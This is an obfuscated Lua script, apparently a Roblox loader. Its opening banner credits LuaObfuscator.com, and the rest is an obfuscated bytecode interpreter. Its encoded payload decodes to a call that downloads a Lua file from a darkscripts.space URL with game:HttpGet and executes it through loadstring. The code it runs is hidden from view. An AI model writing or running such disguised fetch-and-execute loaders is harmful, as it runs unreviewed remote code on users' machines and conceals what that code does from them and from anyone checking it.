--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v85=0;while true do if (v85==0) then v19=v0(v3(v30,1,1));return "";end end else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v30,16));if v19 then local v122=v5(v87,v19);v19=nil;return v122;else return v87;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v88=0 + 0 ;local v89;while true do if (v88==0) then v89=(v31/((5 -3)^(v32-((2 -0) -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -((1620 -(68 + 997)) + 64)))) + (932 -(857 + 74)))) ;return v89-(v89%(569 -(367 + 201))) ;end end else local v90=927 -(214 + 713) ;local v91;while true do if (v90==((1270 -(226 + 1044)) + 0)) then v91=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v91 + v91))>=v91) and (1638 -((6631 -5108) + 114))) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (119 -(32 + 85)) ;return (v36 * (251 + 5)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 1 + 2 );v18=v18 + (961 -(892 + 65)) ;return (v40 * 16777216) + (v39 * (156337 -90801)) + (v38 * 256) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1 -0 ;local v44=(v20(v42,1 -0 ,370 -(87 + 263) ) * ((182 -(67 + 113))^(56 -24))) + v41 ;local v45=v20(v42,16 + 5 ,75 -44 );local v46=((v20(v42,24 + (446 -(145 + 293)) )==(3 -(432 -(44 + 386)))) and  -(1 -0)) or 1 ;if (v45==(952 -(802 + 150))) then if (v44==((1486 -(998 + 488)) -0)) then return v46 * (0 -0) ;else v45=792 -(368 + 423) ;v43=0 -0 ;end elseif (v45==(1490 + 557)) then return ((v44==(0 -0)) and (v46 * (((318 + 680) -(915 + 82))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(1465 -(416 + 26)) ) * (v43 + (v44/((2 + 0)^((56 + 12) -16)))) ;end local function v25(v47) local v48=772 -(201 + 571) ;local v49;local v50;while true do if (v48==(1140 -(116 + 1022))) then v50={};for v108=886 -(261 + 624) , #v49 do v50[v108]=v2(v1(v3(v49,v108,v108)));end v48=12 -9 ;end if (v48==3) then return v6(v50);end if (v48==1) then v49=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;v48=(12 -5) -5 ;end if ((0 -0)==v48) then v49=nil;if  not v47 then local v114=859 -(814 + 45) ;while true do if ((0 -0)==v114) then v47=v23();if (v47==(0 + 0)) then return "";end break;end end end v48=1 + 0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 0 -0 ;end)();local v93=(function() return;end)();local v95=(function() return;end)();while true do if (v92==0) then local v115=(function() return 0 -0 ;end)();local v116=(function() return;end)();while true do if (v115~=0) then else v116=(function() return 1518 -(1191 + 327) ;end)();while true do if (v116==1) then v92=(function() return  #"!";end)();break;end if ((0 + 0)==v116) then v93=(function() return v94();end)();v95=(function() return nil;end)();v116=(function() return 1;end)();end end break;end end end if ( #">"==v92) then if (v93== #"|") then v95=(function() return v94()~=(698 -(208 + 490)) ;end)();elseif (v93==(1 + 1)) then v95=(function() return v96();end)();elseif (v93== #"asd") then v95=(function() return v97();end)();end v98[v99]=(function() return v95;end)();break;end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v52=(function() return function(v100,v101,v102) local v103=(function() return 0;end)();local v104=(function() return;end)();while true do if (v103~=(0 + 0)) then else v104=(function() return 836 -(660 + 176) ;end)();while true do if (v104==0) then local v123=(function() return 0 + 0 ;end)();while true do if (0==v123) then v100[v101-#"[" ]=(function() return v102();end)();return v100,v101,v102;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v66= #"<",v57 do FlatIdent_781F8,Type,v21,Cons,v24,v25,v58,v66=(function() return v51(FlatIdent_781F8,Type,v21,Cons,v24,v25,v58,v66);end)();end v56[ #"xnx"]=(function() return v21();end)();for v67= #"}",v23() do local v68=(function() return 202 -(14 + 188) ;end)();local v69=(function() return;end)();while true do if ((675 -(534 + 141))~=v68) then else v69=(function() return v21();end)();if (v20(v69, #"}", #"{")==(0 + 0)) then local v118=(function() return 0;end)();local v119=(function() return;end)();local v120=(function() return;end)();local v121=(function() return;end)();while true do if (v118~=3) then else if (v20(v120, #"91(", #"xnx")== #" ") then v121[ #"asd1"]=(function() return v58[v121[ #"0313"]];end)();end v53[v67]=(function() return v121;end)();break;end if (v118~=0) then else local v152=(function() return 0 + 0 ;end)();local v153=(function() return;end)();while true do if (v152~=0) then else v153=(function() return 0 + 0 ;end)();while true do if (v153==(0 -0)) then v119=(function() return v20(v69,2 -0 , #"-19");end)();v120=(function() return v20(v69, #"?id=",16 -10 );end)();v153=(function() return 1;end)();end if (v153==(1 + 0)) then v118=(function() return 1;end)();break;end end break;end end end if (v118~=1) then else local v154=(function() return 0;end)();while true do if (v154~=(0 + 0)) then else v121=(function() return {v22(),v22(),nil,nil};end)();if (v119==(0 -0)) then local v174=(function() return 0 + 0 ;end)();local v175=(function() return;end)();while true do if (v174~=0) then else v175=(function() return 0 -0 ;end)();while true do if (v175~=(0 -0)) then else v121[ #"xxx"]=(function() return v22();end)();v121[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v119== #"/") then v121[ #"19("]=(function() return v23();end)();elseif (v119==(869 -(550 + 317))) then v121[ #"xxx"]=(function() return v23() -((2 -0)^16) ;end)();elseif (v119== #"gha") then local v183=(function() return 0;end)();local v184=(function() return;end)();while true do if (v183==(0 -0)) then v184=(function() return 0;end)();while true do if (v184~=(0 -0)) then else v121[ #"-19"]=(function() return v23() -((287 -(134 + 151))^(1681 -(970 + 695))) ;end)();v121[ #"0313"]=(function() return v22();end)();break;end end break;end end end v154=(function() return 1 -0 ;end)();end if (v154~=1) then else v118=(function() return 1992 -(582 + 1408) ;end)();break;end end end if (2~=v118) then else if (v20(v120, #":", #" ")== #"|") then v121[6 -4 ]=(function() return v58[v121[2]];end)();end if (v20(v120,2 -0 ,7 -5 )~= #",") then else v121[ #"91("]=(function() return v58[v121[ #"-19"]];end)();end v118=(function() return 1827 -(1195 + 629) ;end)();end end end break;end end end for v70= #"/",v23() do v54,v70,v28=(function() return v52(v54,v70,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[(2123 -(553 + 424)) -(466 + 679) ];local v64=v60[2 -0 ];local v65=v60[244 -(187 + 54) ];return function(...) local v71=v63;local v72=v64;local v73=v65;local v74=v27;local v75=781 -(162 + 618) ;local v76= -(1901 -((199 -93) + 1794));local v77={};local v78={...};local v79=v12("#",...) -(1 + 0) ;local v80={};local v81={};for v105=0 + 0 ,v79 do if (v105>=v73) then v77[v105-v73 ]=v78[v105 + (1 -0) ];else v81[v105]=v78[v105 + (1 -0) ];end end local v82=(v79-v73) + 1 + 0 ;local v83;local v84;while true do v83=v71[v75];v84=v83[1637 -(1373 + 263) ];if (v84<=(1003 -(451 + 549))) then if (v84<=(1 + 0)) then if (v84==(0 -0)) then v81[v83[2 + 0 ]]=v83[4 -1 ]~=(0 -0) ;else do return;end end elseif ((3249>953) and (v84==(5 -(3 + 0)))) then v81[v83[1386 -(746 + 633 + 5) ]]=v83[2 + 0 + 1 + 0 ];else local v127;local v128,v129;local v130;local v131;v81[v83[2 -0 ]]=v62[v83[3]];v75=v75 + ((1 + 0) -(0 -0)) ;v83=v71[v75];v81[v83[6 -(11 -7) ]]=v62[v83[344 -(218 + 123) ]];v75=v75 + 1 + 0 ;v83=v71[v75];v131=v83[1583 -(1535 + 46) ];v130=v81[v83[3 + (0 -0) ]];v81[v131 + 1 + 0 ]=v130;v81[v131]=v130[v83[564 -(306 + 254) ]];v75=v75 + 1 + 0 ;v83=v71[v75];v81[v83[3 -1 ]]=v83[1260 -(1043 + 214) ];v75=v75 + (1468 -(899 + 568)) ;v83=v71[v75];v81[v83[(354 + 860) -(323 + 889) ]]=v83[(9 -7) + 1 ]~=0 ;v75=v75 + (581 -(361 + 219)) ;v83=v71[v75];v131=v83[4 -2 ];v128,v129=v74(v81[v131](v13(v81,v131 + (604 -(268 + 335)) ,v83[293 -(60 + 230) ])));v76=(v129 + v131) -(573 -(426 + 146)) ;v127=0 + 0 ;for v155=v131,v76 do local v156=1456 -(282 + 1174) ;while true do if ((v156==((1564 -(239 + 514)) -(569 + 242))) or (3273>4573)) then v127=v127 + 1 + 0 ;v81[v155]=v128[v127];break;end end end v75=v75 + 1 + 0 ;v83=v71[v75];v131=v83[5 -3 ];v81[v131]=v81[v131](v13(v81,v131 + 1 + 0 ,v76));v75=v75 + 1 + 0 ;v83=v71[v75];v81[v83[1026 -(706 + 318) ]]();v75=v75 + (1252 -(721 + 530)) ;v83=v71[v75];do return;end end elseif ((v84<=5) or (3151<1284)) then if ((v84>(1275 -(945 + 326))) or (1850==1529)) then v81[v83[4 -2 ]]=v62[v83[3 + 0 ]];else v81[v83[702 -(271 + 429) ]]();end elseif (v84<=(3 + 3)) then local v149=v83[2 + (1329 -(797 + 532)) ];v81[v149]=v81[v149](v13(v81,v149 + (1501 -(1408 + 92)) ,v76));elseif ((821<2123) and (v84>7)) then local v157=v83[1088 -(335 + 126 + 625) ];local v158=v81[v83[1291 -(993 + 295) ]];v81[v157 + 1 + 0 ]=v158;v81[v157]=v158[v83[1175 -(418 + 753) ]];else local v162=0 + 0 ;local v163;local v164;local v165;local v166;while true do if (v162==(1 + 1 + 0)) then for v176=v163,v76 do v166=v166 + 1 + 0 ;v81[v176]=v164[v166];end break;end if ((1 + 0)==v162) then v76=(v165 + v163) -(530 -(406 + 123)) ;v166=0 -0 ;v162=2;end if ((902<2325) and (v162==((2635 -1514) -(118 + 1003)))) then v163=v83[5 -3 ];v164,v165=v74(v81[v163](v13(v81,v163 + (1770 -(1749 + 20)) ,v83[1 + 2 ])));v162=1323 -((2451 -(373 + 829)) + 73) ;end end end v75=v75 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574035E3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F736372697074732F63613135666431632D616234662D346533352D383061652D33302Q3461653137316238615F313331383237342Q332Q37333938393Q38302E6C756100093Q0012033Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000400016Q000100049Q0000026Q000100016Q00017Q00",v9(),...);
